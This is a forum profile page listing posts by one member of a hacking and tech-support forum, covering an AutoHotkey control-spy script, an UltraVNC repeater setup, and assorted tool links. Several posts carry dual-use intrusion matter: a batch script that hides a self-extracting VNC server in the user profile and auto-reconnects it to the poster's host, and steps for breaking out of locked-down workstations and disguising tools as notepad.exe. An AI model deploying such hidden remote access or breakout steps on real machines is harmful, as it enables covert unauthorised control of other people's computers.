Jump to content

operat0r_001

Active Members
  • Posts

    327
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by operat0r_001

  1. interesting ? you got the exe I cna poke with ?? I need help with one of my projects a fully automated mass uninstaller idea being you run it walk away and everything is uninstalled you put on the list :) not needing to know the options etc it would do things like not reboot and try to select the right stuff to click :P pm me if you any good at it .. F12:: ; Control Spy - Written by A.N.Suresh Kumar AKA Goyyah / 25-Aug-2006 / Version ?????? AutoTrim, OFF ^#!F12:: FileDelete, %A_Temp%\ControlList.txt IfWinExist,Control.Spy.Report,WinActivate,Control.Spy.Report IfWinExist,Control.Spy.Report,Exit Clis= ID:=WinExist("A") WinGet, Clist, ControlList, ahk_id %ID% WinGetTitle, Title, ahk_id %ID% WinGetClass, Class, ahk_id %ID% FileAppend, %Title% [Class:%Class%]`n, %A_Temp%\ControlList.txt FileAppend,---------------------------------------------------------------------------------------------------`n, %A_Temp%\ControlList.txt FileAppend,Sl c_Hwnd ClassNN Control Text (40 Characters only) `n, %A_Temp%\ControlList.txt FileAppend,---------------------------------------------------------------------------------------------------`n, %A_Temp%\ControlList.txt Loop, Parse, CList, `n { ControlGet,cHwnd, Hwnd,, %A_LoopField%, ahk_id %ID% ControlGetText,cText,, ahk_id %cHwnd% StringReplace,cText,cText, `n, % Chr(32), All StringReplace,cText,cText, `r, % Chr(32), All StringLeft,cText,cText,40 Clis = % Clis "`n" SetWidth(A_Index,3) ". " SetWidth(cHwnd,12) " " SetWidth(A_LoopField,40) " " Ctext } FileAppend, %Clis%`n, %A_Temp%\ControlList.txt FileAppend,---------------------------------------------------------------------------------------------------`n, %A_Temp%\ControlList.txt FileAppend,* Control Spy * By Goyyah, %A_Temp%\ControlList.txt FileRead, Report, %A_Temp%\ControlList.txt Gui,Font, s9, Courier New Gui,Add,Edit, w740 h540 , % Report Gui,Add,Button, x600 gGuiClose w140 , &Copy to Clipboard Gui,Show,,Control.Spy.Report Send, {Home} Return GuiEscape: GuiClose: Clipboard= % "[code]`n" Report "`n/[code]" ReLoad Return SetWidth(Str,Width) { Loop { If (StrLen(Str)>=Width) Break Else Str= % Str Chr(32) } Return Str } F11:: SoundPlay, %A_WinDir%\Media\ding.wav ;'ControlClick, OK, Some Window Title ; Clicks the OK button ControlClick, *ext*, BlackBerry Desktop Software 4.6 - InstallShield Wizard F10:: SoundPlay, %A_WinDir%\Media\ding.wav SetTitleMatchMode RegEx ;set main window title WinGetActiveTitle, main1 ; check for main window ;IfWinNotActive %main1% ;{ ;msgbox, startclicking ;} SoundPlay, %A_WinDir%\Media\ding.wav SetTitleMatchMode RegEx ;ControlClick, .*move.*,.* ;ControlClick, *[N|n]ext.*,.* ;ControlClick, *[O|o][K|k].Yes,.* ControlClick, Yes,.*
  2. take a look at some foo here http://rmccurdy.com/scripts/quickclean.txt
  3. http://www.binrev.com/forums/index.php/top...e__hl__repeater ultravnc FTW mine now support windows vista/7 etc http://forums.remote-exploit.org/programmi...ktop-vista.html
  4. operat0r_001

    iKAT

    if they block the url use proxy.org or of the like any proxy with URL encoding will block blacklisted site like that ..
  5. Portable Eclipse for Android dev / JRE (java) and / Android 1.5 SDK<br> http://rapidshare.com/files/280881975/eclipse.zip.001 http://rapidshare.com/files/280887930/eclipse.zip.002 Been poking with my G1 http://delicious.com/operat0r/android links to tons of example apps
  6. no such thing a wifi security :) its all failsause
  7. I just added hacks by rvdh. http://feedity.com/rss.aspx/ath-cx/UldUWlFU http://rmccurdy.com/feeds.xml
  8. we use Zimbra exchange is for noobs make a thinstall of Camtasia Studio
  9. make a new local administrator > boot with CD or USB press F5 on boot try to login as admin get something to run: press F3 search for stuff to run cmd.exe etc ..also try to run stuff with IE "ctl+o" cmd etc ... also download cmd.exe and try to run it try ctrl+alt+del to run stuff look for old software on the system to exploit (insert adobe and flash) maybe even local privilege escalation :) I have a usb drive with all my *tools* on it along with BT4 etc .. like this .. http://thepiratebay.org/torrent/4841204/UBER_PORTABLE_PACK you can also thinstall games and just rename it to notepad.exe etc ..
  10. * give them the drive on a silver platter and tell them enjoy ! * boot safemode with networking kill explorer and scan with panda activescan pro http://rmccurdy.com/email.html * also tell IT they should lock down all users or you will be back in a week ... noobs ... * I offer flat 60$ remote support :)
  11. rmccurdy.com/m3u.m3u all port 80 feeds from shoutcast autoupdated monthly :)
  12. hehe you need to boot with the disk in the drive :P I did not think of that .. PM me know if you fix it
  13. * this script TESTED WITH VISTA/WINDOWS 7 and XP * this script auto reconnects when it does not find a established connection with the winvnc.exe * file transfers work great on XP not so much windows 7 random crash * get the repeater ( or just fwd a port to yourself on your router ) ( repeater allows you to remote any desktop from any desktop .. ( *NIX and WINDOWS ) IE no remote desktop over remote desktop .. * http://sourceforge.net/projects/ultravnc/f...ix%20Repeaters/ #/etc/uvncrepeater.ini [general] viewerport = 21 serverport = 3389 ownipaddress = 0.0.0.0 maxsessions = 100 #runasuser = uvncrep runasuser = root allowedmodes = 3 logginglevel = 3 [mode1] allowedmode1serverport = 0 requirelistedserver = 0 srvListAllow0 = 0.0.0.0;Allow network 10.x.x.x srvListAllow1 = 192.168.0.0;Allow network 192.168.x.x srvListAllow1 = 0.0.0.0 [mode2] requirelistedid = 0 idlist0 = 1111 idlist1 = 2222 idlist2 = 6667 idlist3 = 0 idlist4 = 0 idlist5 = 0 idlist6 = 0 idlist7 = 0 idlist8 = 0 idlist9 = 0 [eventinterface] * start the repeater * extract using 7-zip.org my exe and change the domain to yours etc ... http://rmccurdy.com/scripts/quickvnc.exe # vnccheck.tmp cax /killall winvnc.exe Timeout.exe 5 start winvnc -autoreconnect -id:%ID% -connect rmccurdy.com::3389 -run rem auto reconnect loop :loop Timeout.exe 60 Tcpvcon.exe -c | egrep -ia "winvnc.exe" | egrep "EST" if errorlevel 1 goto restartvnc Timeout.exe 60 goto loop :restartvnc echo Connection lost Killing VNC Processes... Timeout.exe 10 cax /killall winvnc.exe Timeout.exe 10 echo Reconnecting ... start winvnc -autoreconnect -id:%ID% -connect rmccurdy.com::3389 -run goto loop change the start winvnc -autoreconnect -id:%ID% -connect rmccurdy.com::3389 -run * for vista I mean windows 7 .... you need to make sure to RE RUN it as ADMINISTATOR and kill the old CMD.EXE or just have the user run it as admin google for why etc not going into this now .. it was a PIA ... * pack the EXE using winrar SFX option I have it extract to %userprofile%\vnc2 and overwrite/hidden etc ... ( the way it runs you can run it more then once so beware of multi vncchecks running with multi ID's from the same client.. * you can also do this with some 7-zip fu ... * now you are ready to connect to the repeater and control the host that ran your packed EXE * run vncviewer.exe client and set it up like this ( for extra security you can add crypto ) * be sure to add the :: not just : the older client saves only one : * you may also need to restart repeater and kill -9 it sometimes ... ... * change the ports on the server you will need escalated for under port 1024 in windows/*nix
  14. panda active scan pro FTW rmccurdy.com/email.html
  15. all you had to say is cpanel.... http://rmccurdy.com/scripts /cpanel_scripts/ see the hackcheck lol my cpanel script cerca 2007 the webhost I worked for was about 40% owned I enjoyed watching people and detecting them colocate get me root ill setup snort mod_sec and audit the site for ya ;)
  16. you can use what ever you want if you use crypto .. hell dns tunnel it if you have to :)
  17. NO ... and NO ... vncrepeater owns them all ... 300K client download ( mine has extra stuff like vista support etc ... )
  18. knoppmyth mythdora http://rmccurdy.com/upload1/mythtv.pdf
  19. lam-O but finished .. http://rmccurdy.com/scripts/ find_localadmin.zip
  20. snort out snort it has all that .. also theres also Karmetasploit
  21. http://arrggggggggg_pirates_arebad.org/tor...acOSX_Windows_v wonder if this works .. I dont know of any rtmpe feeds I use real media catcher and uslsnooper to do these types of things http://rmccurdy.com/upload1/Replay%20Media%20Catcher.zip uslsnooper : free
  22. * "tutorial or a walk through place." Yes skiddie powers activate! Maybe once a month one of you could think of something somewhat original or hell take submissions on ideas for shows you have ton of users! * admit it could any of you do a weekly show with *original* content? I have a hard time thinking of new presentations myself so I can't bitch .. * Hak.5 is THE only VIDEO security podcast I know of that is any good/recent ..
  23. cain and able has voice support. I got portable metasploit and w3af on my site :P google ntop and netflowd or just pop on the eternal firewall and TCPDUMP ftw :)
×
×
  • Create New...